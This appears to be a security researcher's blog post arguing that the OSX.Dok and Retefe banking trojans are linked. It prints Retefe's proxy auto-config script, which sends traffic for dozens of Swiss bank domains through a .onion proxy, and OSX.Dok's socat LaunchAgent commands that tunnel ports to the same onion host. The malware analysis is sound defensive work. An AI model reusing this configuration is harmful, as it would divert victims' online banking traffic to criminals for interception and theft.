Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods that i had seen used by Retefe, having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks. The United Kingdom, and France but a real target in my own experience has been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint here so slightly confusing.

The part of Retefe which struck me as similar included the proxy .JS file for the trojan to identify the range of banking sites it wants to intercept.

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

from the OSX version which include the following LaunchAgents

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe       OSX/Dok

Root Certificate    Root Certificate

Proxy hijacking   Proxy hijacking

paoyu7gub72lykuk.onion paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of media for a while, and the revenue they generate are clearly attractive to criminals and to law enforcement as demonstrated recently both here and here.